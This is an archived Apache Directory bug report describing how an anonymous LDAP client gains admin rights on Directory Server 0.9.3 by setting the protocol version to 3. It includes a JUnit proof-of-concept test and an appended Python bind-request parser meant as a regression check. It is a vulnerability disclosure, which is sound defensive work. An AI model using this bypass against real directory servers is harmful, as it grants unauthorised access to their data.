directory-dev mailing list archives
From "Endi S. Dewata (JIRA)" <directory-...@incubator.apache.org>
Subject [jira] Created: (DIREVE-239) Anonymous user may gain access as admin user
Date Wed, 31 Aug 2005 00:45:04 GMT
Anonymous user may gain access as admin user
--------------------------------------------

         Key: DIREVE-239
         URL: http://issues.apache.org/jira/browse/DIREVE-239
     Project: Directory Server
        Type: Bug
    Versions: 0.9.3
    Reporter: Endi S. Dewata
 Assigned to: Alex Karasulu


Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the
JNDI client.

To show the problem, add a print statement in the AuthenticationService.java at line 369:

                // perform the authentication
                LdapPrincipal authorizationId = authenticator.authenticate( ctx );
                System.out.println("Authorization ID: "+authorizationId);

Start the server, then run the following program:

import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import java.util.Hashtable;

public class Test extends TestCase {

    public void testAnonymousBindWithLDAPVersion3() throws Exception {

        String suffix = "dc=apache,dc=org";

        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
        // Leave this line commented out for a plain anonymous bind; uncomment it
        // to reproduce the problem (anonymous bind authenticated as admin).
        // env.put("java.naming.ldap.version", "3");

        DirContext ctx = new InitialDirContext(env);

        SearchControls sc = new SearchControls();
        sc.setSearchScope(SearchControls.SUBTREE_SCOPE);

        NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);

        System.out.println("Search results:");

        int counter = 0;
        while (ne.hasMore()) {
            SearchResult sr = (SearchResult)ne.next();
            String rdn = sr.getName();
            System.out.println(" - "+("".equals(rdn) ? suffix : rdn+","+suffix));
            counter++;
        }

        System.out.println("Found "+counter+" entries.");

        ctx.close();
    }
}

Without java.naming.ldap.version=3 the user remains anonymous (the printed authorization
ID is empty). With java.naming.ldap.version=3, however, the anonymous user is authenticated as
the admin user without supplying any password.
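As an added illustration, and not code from ApacheDS or from this report: a small Python model of how a server should classify a simple BindRequest under RFC 4511/4513, where the protocol version field is decoded but never influences the resulting authorization identity. The three encoded requests are constructed by hand for this example; the name uid=admin,ou=system is an assumed sample DN.

```python
# Added example (not ApacheDS code): classify a BER-encoded LDAP BindRequest.
# The authorization identity must follow only from the bind name and credentials,
# never from the protocolVersion value that a JNDI client chooses to send.


def _tlv(buf, pos):
    """Decode one BER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length (multi-byte)
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def classify_bind(message: bytes) -> dict:
    """Parse an LDAPMessage carrying a simple BindRequest and classify it."""
    tag, body, _ = _tlv(message, 0)
    assert tag == 0x30, "LDAPMessage must be a SEQUENCE"
    _, msg_id, pos = _tlv(body, 0)
    tag, bind, _ = _tlv(body, pos)
    assert tag == 0x60, "protocolOp must be BindRequest [APPLICATION 0]"
    _, version, pos = _tlv(bind, 0)
    _, name, pos = _tlv(bind, pos)
    auth_tag, cred, _ = _tlv(bind, pos)
    if auth_tag != 0x80:                    # only simple authentication is modelled
        raise ValueError("SASL bind not handled in this example")
    name = name.decode("utf-8")
    # RFC 4513 section 5.1: empty name + empty password -> anonymous;
    # name + empty password -> unauthenticated (refused by default);
    # name + password -> simple, a principal only after the password is verified.
    if not name and not cred:
        kind = "anonymous"
    elif not cred:
        kind = "unauthenticated"
    else:
        kind = "simple"
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),  # parsed, deliberately not used
        "kind": kind,
        "authorization_id": name if kind == "simple" else "",
    }


# Constructed sample requests (hand-encoded BER), all with message id 1.
V2_ANONYMOUS = bytes.fromhex("300c020101600702010204008000")
V3_ANONYMOUS = bytes.fromhex("300c020101600702010304008000")
V3_NAME_NO_PASSWORD = (bytes.fromhex("301f020101601a020103")
                       + b"\x04\x13uid=admin,ou=system" + b"\x80\x00")
```

A regression check for the report above is the pair of anonymous requests: both must yield an empty authorization identity regardless of the version value.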
